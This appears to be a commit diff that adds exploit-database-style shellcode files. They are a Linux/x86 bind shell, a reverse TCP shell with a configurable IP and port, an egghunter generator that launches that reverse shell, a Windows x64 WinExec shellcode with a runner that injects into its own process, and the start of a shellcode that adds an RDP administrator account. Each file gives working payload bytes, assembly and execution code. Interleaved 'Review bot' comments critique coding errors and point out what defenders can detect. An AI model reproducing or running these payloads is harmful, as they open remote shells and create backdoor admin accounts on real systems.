"\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x56\x89\xe1\xcd\x80\x89\xc6\x31\xc9\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf2\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80";
main(int argc, char *argv[])
{
/* Default port at 28th and 29th byte index: \x11\x5c */
// in case no port is provided the default would be used
if (argc < 2) {
printf("No port provided, 4444 (0x115c will be used)\n");
}
else
{
int port = atoi(argv[1]);
printf("Binding to %d (0x%x)\n", port, port);
unsigned int p1 = (port >> 8) & 0xff;
unsigned int p2 = port & 0xff;
// printf("%x %x\n", p1, p2);
shellcode[28] = (unsigned char){p1};
shellcode[29] = (unsigned char){p2};
// printf("%x %x", shellcode[28], shellcode[29]);
}
int (*ret)() = (int(*)())shellcode;
ret();
}
/***
; shellcode assembly
global _start:
section .text
_start:
; socketcall (0x66)
; syscall SYS_SOCKET (0x01) - int socket(int domain, int type, int protocol);
xor eax, eax
xor ebx, ebx
mov al, 0x66
mov bl, 0x01
; pushing arguments to the stack backwards: int protocol (PF_INET, SOCK_STREAM, 0)
xor edx, edx
push edx ; int domain
push 0x01 ; SOCK_STREAM
push 0x02 ; PF_INET (AF_INET and PF_INET is the same)
mov ecx, esp
; syscall
int 0x80
; save returned file descriptor from eax into esi for later use
mov esi, eax
; socketcall (0x66)
; syscall BIND (0x02) - int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
mov al, 0x66
mov bl, 0x02
; pushing arguments to the stack backwards:
; bind(sockid, (struct sockaddr *) &addrport, sizeof(addrport));
; xor edx, edx
push edx
push word 0x5c11 ; port 4444
push word 0x02 ; PF_INET
mov ecx, esp
push 0x10 ; sockaddr length
push ecx ; sockaddr pointer
push esi ; saved socket descriptor
mov ecx, esp
; syscall
int 0x80
; socketcall (0x66)
; syscall SYS_LISTEN (0x04) - int listen(int sockfd, int backlog);
mov al, 0x66
mov bl, 0x04
; pushing arguments to the stack backwards:
; listen(sockid, 0);
push edx ; push 0
push esi ; socket file descriptor saved earlier in esi
mov ecx, esp
; syscall
int 0x80
; socketcall (0x66)
; syscall SYS_ACCEPT (0x05) - int sock_accept = accept(sockid, 0, 0);
mov al, 0x66
mov bl, 0x05
push edx
push esi ; socket file descriptor saved earlier in esi
mov ecx, esp
; syscall
int 0x80
; save returned file descriptor from eax into esi for later use
mov esi, eax
; dup2 (0x3f)
; 0 ; stdin
; dup2 (0x3f)
; 1 ; stdout
; dup2 (0x3f)
; 2 ; stderr
; let's put all this in a loop
xor ecx, ecx
DUPCOUNT:
; (0 - stdin, 1 - stdout, 2 - stderr) dup2 - __NR_dup2 63
; int dup2(int oldfd, int newfd);
; xor eax, eax
mov al, 0x3f
; ebx (socket descriptor, being copied over from esi saved earlier)
; ecx will be calculated automatically based on the loop value
mov ebx, esi ; saved socket descriptor
; syscall
int 0x80
inc cl
cmp cx, 2
jle DUPCOUNT ; count until 2 is reached
; execve (0x0b)
; /bin//sh
xor eax, eax
; xor ebx, ebx
; sub esp, 8 ; reserve some bytes in the stack to work with
push eax ; substituted sub esp, 8 to reduce opcode size
mov al, 0x0b
push 0x68732f2f ; //sh
push 0x6e69622f ; /bin
mov ebx, esp
xor ecx, ecx
; syscall
int 0x80
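
Review bot: `main(int argc, char *argv[])` relies on implicit `int`, and `atoi` is used without `#include <stdlib.h>`; more importantly the port is never validated: `atoi` accepts negative and out-of-range values that the two `& 0xff` masks silently truncate, and nothing checks that either byte of the port is non-zero even though the header advertises a null-free payload, so the generated bytes can contradict the title. Check `1 <= port <= 65535` and report when `p1 == 0 || p2 == 0` instead of patching the bytes in; the `(unsigned char){p1}` compound literals can be plain `(unsigned char)p1` casts. For defenders, the `netstat -antlp` line in the usage block shows the observable: a `LISTEN` socket owned by a process that is not a known service.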
***/

@ -0,0 +1,174 @@
# Exploit Title: Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)
# Date: 10/07/2021
# Exploit Author: d7x
# Tested on: Ubuntu x86
/***
Linux/x86 Reverse TCP Shell with dynamic IP and port binding Shellcode (tested on Ubuntu 12.04 LTS)
Usage: gcc -z execstack -o shell_reverse_tcp shell_reverse_tcp.c
$ ./shell_reverse_tcp_shellcode 192.168.1.137 4444
Connecting to 192.168.1.236 (0xec01a8c0):4444 (0x115c)
Byte 26: c0
Byte 27: a8
Byte 28: 01
Byte 29: ec
$ nc -nlv 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.137 45219
id
uid=0(root) gid=0(root) groups=0(root)
*** Created by d7x
https://d7x.promiselabs.net
https://www.promiselabs.net ***
***/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
unsigned char shellcode[] = \
"\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\x31\xc0\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf0\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"; //IP address at 26th byte; Port at 32nd byte
main(int argc, char *argv[])
{
/* Default IP and port at 26th and 32nd byte index: \x7f\x01\x01\x01 \x11\x5c */
// in case no port is provided the default would be used
if (argc < 3) {
printf("No IP or port provided, 127.1.1.1:4444 (0x7f010101:0x115c) will be used\n");
}
else
{
// convert IP address to binary representation and store in ipaddr.sin_addr.s_addr
struct sockaddr_in ipaddr;
inet_aton(argv[1], &ipaddr.sin_addr.s_addr);
int port = atoi(argv[2]);
printf("Connecting to %s (0x%x):%d (0x%x)\n", argv[1], ipaddr.sin_addr.s_addr, port, port);
unsigned int p1 = (port >> 8) & 0xff;
unsigned int p2 = port & 0xff;
// printf("%x %x\n", p1, p2);
shellcode[32] = (unsigned char){p1};
shellcode[33] = (unsigned char){p2};
/* 1st byte: 0xAABBCCDD >> 0 & 0xff
2nd byte: 0xAABBCCDD >> 8 & 0xff
3rd byte: 0xAABBCCDD >> 16 & 0xff
4th byte: 0xAABBCCDD >> 24 & 0xff
*/
int i, a;
for (i = 26, a = 0; i <= 29; i++, a+=8)
{
shellcode[i] = (ipaddr.sin_addr.s_addr >> a) & 0xff ;
printf("Byte %d: %.02x\n", i, shellcode[i]);
}
}
int (*ret)() = (int(*)())shellcode;
ret();
}
/***
; shellcode assembly
global _start:
section .text
_start:
; socketcall (0x66)
; syscall SYS_SOCKET (0x01) - int socket(int domain, int type, int protocol);
xor eax, eax
xor ebx, ebx
mov al, 0x66
mov bl, 0x01
; pushing arguments to the stack backwards: int protocol (PF_INET, SOCK_STREAM, 0)
xor edx, edx
push edx ; int domain
push 0x01 ; SOCK_STREAM
push 0x02 ; PF_INET (AF_INET and PF_INET is the same)
mov ecx, esp
; syscall
int 0x80
; save returned file descriptor from eax into esi for later use
mov esi, eax
; socketcall (0x66)
; syscall SYS_CONNECT (0x03) - int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
mov al, 0x66
mov bl, 0x03
; pushing arguments to the stack backwards:
; connect(sockid, (struct sockaddr *) &addrport, sizeof(addrport));
push 0x0101017f ; 127.1.1.1
push word 0x5c11 ; port 4444
push word 0x02 ; PF_INET
mov ecx, esp
push 0x10 ; sockaddr length
push ecx ; sockaddr pointer
push esi ; saved socket descriptor
mov ecx, esp
; syscall
int 0x80
; dup2 - __NR_dup2 63
; dup2(0), dup2(1), dup2(2)
; (0 - stdin, 1 - stdout, 2 - stderr)
; let's put all this in a loop
xor ecx, ecx
DUPCOUNT:
; int dup2(int oldfd, int newfd);
xor eax, eax
mov al, 0x3f
; ebx (socket descriptor, being copied over from esi saved earlier)
; ecx will be calculated automatically based on the loop value
; xor ebx, ebx
mov ebx, esi ; saved socket descriptor
; syscall
int 0x80
inc cl
cmp cx, 2
jle DUPCOUNT ; count until 2 is reached
; execve (0x0b)
; /bin//sh
xor eax, eax
; xor ebx, ebx
push eax ; reserve some bytes in the stack to work with
mov al, 0x0b
push 0x68732f2f ; //sh
push 0x6e69622f ; /bin
mov ebx, esp
xor ecx, ecx
; syscall
int 0x80
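
Review bot: `inet_aton` is declared in `<arpa/inet.h>`, not `<netdb.h>`, so `inet_aton(argv[1], &ipaddr.sin_addr.s_addr);` is implicitly declared, and its second argument should be `&ipaddr.sin_addr` (a `struct in_addr *`) rather than the address of the `s_addr` member; its return value is also ignored, so a malformed address leaves `ipaddr.sin_addr` uninitialised and the loop `for (i = 26, a = 0; i <= 29; i++, a+=8)` copies stack garbage into the payload. Test `if (!inet_aton(argv[1], &ipaddr.sin_addr)) return 1;` before using it, add `<stdlib.h>` for `atoi`, and give `main` an explicit `int` return type. The sample session in the header is also inconsistent: the command line targets 192.168.1.137 while the program reports `Connecting to 192.168.1.236`.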
***/

@ -0,0 +1,214 @@
# Exploit Title: Linux/x86 - Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
# Date: 18/07/2021
# Exploit Author: d7x
# Tested on: Ubuntu x86
/***
Linux/x86 - Egghunter Reverse TCP Shell Shellcode Generator with dynamic IP and port Shellcode
Author: d7x
https://d7x.promiselabs.net/
https://www.promiselabs.net/
***/
/*
Egghunter payloads from skape modified to work on a modern up to date architecture
For detailed information on the egghunter payloads and egghunter research refer to the original whitepaper by skape:
Safely Searching Process Virtual Address Space http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
Example usage of egghunters https://www.fuzzysecurity.com/tutorials/expDev/4.html
*/
/* Usage: $ gcc -fno-stack-protector -z execstack -o egghunter egghunter_shellcode.c
$ ./egghunter 2 3d7xC0D3 192.168.1.137 6666 # This will output AND execute the egghunter! (if you get a seg fault/core dumped error either your shellcode output contains null bytes or you have no idea what you are doing)
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
void PrintShellcode(unsigned char* s);
void change_shellcode_bytes(unsigned char shellcode[], int offset, int n, unsigned char new[]);
unsigned char* ConvertStrToHex(unsigned char* s);
unsigned char egghunter[][200] = { \
{"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"}, // access method - 39 bytes
{"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"}, //access revisited (fixed) - 37 bytes
{"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"} //sigaction method (fixed) - 32 bytes
};
/* unsigned char egghunter[] = \
"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (fixed) - 32 bytes
//"\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (original version by skape - 30 bytes)
//"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (fixed) - 37 bytes
//"\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (original version by skape) - 35 bytes
//"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"; // access method - 39 bytes
*/
/* Reverse TCP Shell:
egg \x90\x50\x90\x50\x90\x50\x90\x50
127.1.1.1 4444 */
unsigned char shellcode[] = \
"\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\x31\xc0\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf0\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"; //IP address at eggsize + 26th byte; Port at eggsize + 32nd byte
int eggsize = 4; //default
main(int argc, char *argv[])
{
if (argc < 2)
{
printf("Usage: %s <egghunter> [egg] [IP] [Port]", argv[0]);
printf("\nExample: %s 0 0x9050 127.1.1 4444\n"
"%s 1 AABB 127.1.1.1 4444\n"
"%s 2 AABBCCDD 127.1.1.1 4444\n"
"%s 2 3d7xC0D3 127.1.1.1 4444\n", argv[0], argv[0], argv[0], argv[0]);
printf("\n\nDefault egg: \\x90\\x50\\x90\\x50 (push eax, nop, push eax, nop)"
"\nDefault shellcode IP and port 127.1.1.1:4444");
printf("\n\nAvailable egghunters:"
"\n0 - access method (39 bytes), requires executable egg"
"\n1 - access revisited (37 bytes)"
"\n2 - sigaction (32 bytes)\n"
);
return 0;
}
int eh = atoi((char *)argv[1]);
if (eh < 0 || eh > 2)
{
printf("Invalid Egghunter: %d!\n", eh);
return 0;
}
if (argc > 2)
{
if (argv[2][0] == '0' && argv[2][1] == 'x') argv[2] += 2;
if (strlen(argv[2]) != 4 && strlen(argv[2]) != 8)
{
printf("Egg has to be at least 4 or exactly 8 bytes!"
"\nExample eggs: 9050, 9060, C0D3,"
"\n d7xC0D3D, 3d7xC0D3, 3d7xC0D3, 7d7xC0D3"
"\n"
);
return 0;
}
int i;
for (i = 0; i < strlen(argv[2]); i+=2)
if (argv[2][i] == '0' && argv[2][i+1] == '0')
{
printf("No null bytes!\n");
return 0;
}
}
/* change egg if provided */
int eh_offset = 1; // default offset for access method (39 bytes)
if (eh == 1) eh_offset = 23; // offset for access revisited (37 bytes)
else if (eh ==2) eh_offset = 18; // offset for sigaction (32 bytes)
if (argc > 2) {
unsigned char* new_egg = argv[2], *s, *tmp;
printf("Changing egg to %s...\n", new_egg);
s = ConvertStrToHex(argv[2]);
tmp = s;
//fill buffer - 4 bytes of [egg], then concatenate additional 4 bytes of [egg] (8 bytes)
strcat(tmp, s);
if (strlen(argv[2]) == 4)
strcat(tmp, tmp);
//PrintShellcode(s);
change_shellcode_bytes(egghunter[eh], eh_offset, eh_offset+3, s);
change_shellcode_bytes(shellcode, 0, 7, tmp);
}
printf("Egghunter %d, size %d\n", eh, strlen(egghunter[eh] ) );
printf("Egghunter shellcode: \n");
PrintShellcode(egghunter[eh]);
printf("\nReverse TCP Shellcode (%d bytes): \n", strlen(shellcode));
// change shellcode IP address
unsigned char *s2 = shellcode;
if (argc > 3)
{
printf("%s\n", argv[3]);
// convert IP address to binary representation and store in ipaddr.sin_addr.s_addr
struct sockaddr_in ipaddr;
inet_aton(argv[3], &ipaddr.sin_addr.s_addr);
int i = eggsize*2+26, a;
int e = i+3;
for (i, a = 0; i <= e; i++, a+=8)
{
s2[i] = (ipaddr.sin_addr.s_addr >> a) & 0xff ;
printf("Byte %d: %.02x\n", i, s2[i]);
}
}
// change shellcode Port
int port = 4444; //0x115c - default
if (argc > 4)
{
port = atoi(argv[4]);
unsigned int p1 = (port >> 8) & 0xff;
unsigned int p2 = port & 0xff;
s2[eggsize*2+32] = (unsigned char){p1};
s2[eggsize*2+33] = (unsigned char){p2};
}
printf("Port %d\n", port);
PrintShellcode(s2);
printf("\n");
int (*ret)() = (int(*)())egghunter[eh];
ret();
}
void change_shellcode_bytes(unsigned char* shellcode_n, int offset, int n, unsigned char* new)
{
int i, a;
for (i = offset, a = 0; i <= n; i++, a++)
shellcode_n[i] = (unsigned char) {new[a]};
// printf("Byte %d: %.02x\n", i, shellcode_n[i]);
}
void PrintShellcode(unsigned char* s)
{
printf("\"");
while (*s)
printf("\\x%.02x", (unsigned int) *s++);
printf("\"\n");
}
unsigned char* ConvertStrToHex(unsigned char* s)
{
if (s[0] == '0' && s[1] == 'x') s += 2;
unsigned char buf[strlen(s)/2];
buf[strlen(s)/2] = '\0';
int len = sizeof(buf);
size_t count;
for (count = 0; count < len; count++) {
sscanf(s, "%2hhx", &buf[count]);
s += 2;
}
return buf;
}
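
Review bot: `ConvertStrToHex` returns `buf`, a variable-length array that ceases to exist when the function returns, so `s = ConvertStrToHex(argv[2]);` in `main` works on a dangling pointer; the line `buf[strlen(s)/2] = '\0';` also writes one element past the end of that array. In the caller, `tmp = s; strcat(tmp, s);` concatenates a buffer onto itself, which `strcat` does not permit for overlapping operands, and `strcat(tmp, tmp)` repeats the problem. Return heap memory (`malloc(len + 1)`) or fill a caller-supplied array, and assemble the 8-byte egg with `memcpy` into a fixed `unsigned char egg[8]`. Minor: `for (i, a = 0; ...)` has a no-op first clause, and `new` as a parameter name stops the file compiling as C++.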

@ -0,0 +1,133 @@
# Shellcode Title: Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)
# Shellcode Author: Bobby Cooke (boku)
# Date: 02/05/2021
# Tested on: Windows 10 v2004 (x64)
# Shellcode Description:
# 64bit Windows 10 shellcode that dynamically resolves the base address of kernel32.dll via PEB & ExportTable method.
# Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities.
# Grew tired of Windows Defender alerts from MSF code when developing, so built this as a template for development of advanced payloads.
; Compile & get shellcode from Kali:
; nasm -f win64 popcalc.asm -o popcalc.o
; for i in $(objdump -D popcalc.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
; Get kernel32.dll base address
xor rdi, rdi ; RDI = 0x0
mul rdi ; RAX&RDX =0x0
mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
mov r8, rbx ; RBX & R8 = &kernel32.dll
; Get kernel32.dll ExportTable Address
mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
add cx, 0x88ff
shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
; Get &AddressTable from Kernel32.dll ExportTable
xor r10, r10
mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
add r10, r8 ; R10 = &AddressTable
; Get &NamePointerTable from Kernel32.dll ExportTable
xor r11, r11
mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
; Get &OrdinalTable from Kernel32.dll ExportTable
xor r12, r12
mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
add r12, r8 ; R12 = &OrdinalTable
jmp short apis
; Get the address of the API from the Kernel32.dll ExportTable
getapiaddr:
pop rbx ; save the return address for ret 2 caller after API address is found
pop rcx ; Get the string length counter from stack
xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
push rcx ; push the string length counter to stack
loop:
mov rcx, [rsp] ; reset the string length counter from the stack
xor rdi,rdi ; Clear RDI for setting up string name retrieval
mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
repe cmpsb ; Compare strings at RDI & RSI
je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
incloop:
inc rax
jmp short loop
; Find the address of GetProcAddress by using the last value of the Counter
resolveaddr:
pop rcx ; remove string length counter from top of stack
mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>
mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
add rax, r8 ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress
push rbx ; place the return address from the api string call back on the top of the stack
ret ; return to API caller
apis: ; API Names to resolve addresses
; WinExec | String length : 7
xor rcx, rcx
add cl, 0x7 ; String length for compare string
mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec
not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
shr rax, 0x8 ; xEcoll,0xFFFF --> 0x0000,xEcoll
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable
mov r14, rax ; R14 = Kernel32.WinExec Address
; UINT WinExec(
; LPCSTR lpCmdLine, => RCX = "calc.exe",0x0
; UINT uCmdShow => RDX = 0x1 = SW_SHOWNORMAL
; );
xor rcx, rcx
mul rcx ; RAX & RDX & RCX = 0x0
; calc.exe | String length : 8
push rax ; Null terminate string on stack
mov rax, 0x9A879AD19C939E9C ; not 0x9A879AD19C939E9C = "calc.exe"
not rax
;mov rax, 0x6578652e636c6163 ; exe.clac : 6578652e636c6163
push rax ; RSP = "calc.exe",0x0
mov rcx, rsp ; RCX = "calc.exe",0x0
inc rdx ; RDX = 0x1 = SW_SHOWNORMAL
sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
call r14 ; Call WinExec("calc.exe", SW_HIDE)
###########################################################################################################################################
// runShellcode.c
// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net)
#include <windows.h>
void main() {
void* exec;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Shellcode
unsigned char payload[] =
"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
"\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
"\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
"\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
"\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
"\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
"\x48\x83\xec\x20\x41\xff\xd6";
unsigned int payload_len = 205;
exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(exec, payload, payload_len);
rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
WaitForSingleObject(th, -1);
}
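
Review bot: several comments in the assembly disagree with the instructions they annotate: `mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable` loads R10, not RDI; `call r14 ; Call WinExec("calc.exe", SW_HIDE)` follows `inc rdx ; RDX = 0x1 = SW_SHOWNORMAL`, so the call actually uses SW_SHOWNORMAL; and the `shr rax, 0x8` comment (`xEcoll,0xFFFF --> 0x0000,xEcoll`) describes a different string than the WinExec bytes it follows. In the runner, `void main()` should be `int main(void)`, and neither `VirtualAlloc` nor `VirtualProtect` has its result checked before `RtlMoveMemory` and `CreateThread` use the buffer (the second runner in this commit at least checks `rv`); pass `INFINITE` rather than `-1` to `WaitForSingleObject`. For defenders, this RW allocate, copy, flip-to-RX, `CreateThread` sequence is the textbook self-injection pattern that memory-scanning and API-telemetry detections key on, which makes the runner a fair baseline for testing those controls.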

@ -0,0 +1,193 @@
# Shellcode Title: Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)
# Shellcode Author: Bobby Cooke (boku)
# Date: 02/05/2021
# Tested on: Windows 10 v2004 (x64)
# Compiled from: Kali Linux (x86_64)
# Full Disclosure: github.com/boku7/x64win-AddRdpAdminShellcode
# Shellcode Description:
# 64bit Windows 10 shellcode that adds user BOKU:SP3C1ALM0V3 to the system and the localgroups
# Administrators & "Remote Desktop Users". Position Independent Code (PIC) that dynamically resolves
# KERNEL32 DLL via PEB & LDR. Shellcode contains no null bytes, and therefor can be used on typical
# stack based Buffer OverFlow vulnerabilities. Shellcode must be executed from a process with either
# a HIGH or SYSTEM integrity level.
; nasm -f win64 addRdpAdmin.asm -o addRdpAdmin.o
; for i in $(objdump -D addRdpAdmin.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
; Get kernel32.dll base address
xor rdi, rdi ; RDI = 0x0
mul rdi ; RAX&RDX =0x0
mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
mov r8, rbx ; RBX & R8 = &kernel32.dll
; Get kernel32.dll ExportTable Address
mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
add cx, 0x88ff
shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
; Get &AddressTable from Kernel32.dll ExportTable
xor r10, r10
mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
add r10, r8 ; R10 = &AddressTable
; Get &NamePointerTable from Kernel32.dll ExportTable
xor r11, r11
mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
; Get &OrdinalTable from Kernel32.dll ExportTable
xor r12, r12
mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
add r12, r8 ; R12 = &OrdinalTable
jmp short apis
; Get the address of the API from the Kernel32.dll ExportTable
getapiaddr:
pop rbx ; save the return address for ret 2 caller after API address is found
pop rcx ; Get the string length counter from stack
xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
push rcx ; push the string length counter to stack
loop:
mov rcx, [rsp] ; reset the string length counter from the stack
xor rdi,rdi ; Clear RDI for setting up string name retrieval
mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
repe cmpsb ; Compare strings at RDI & RSI
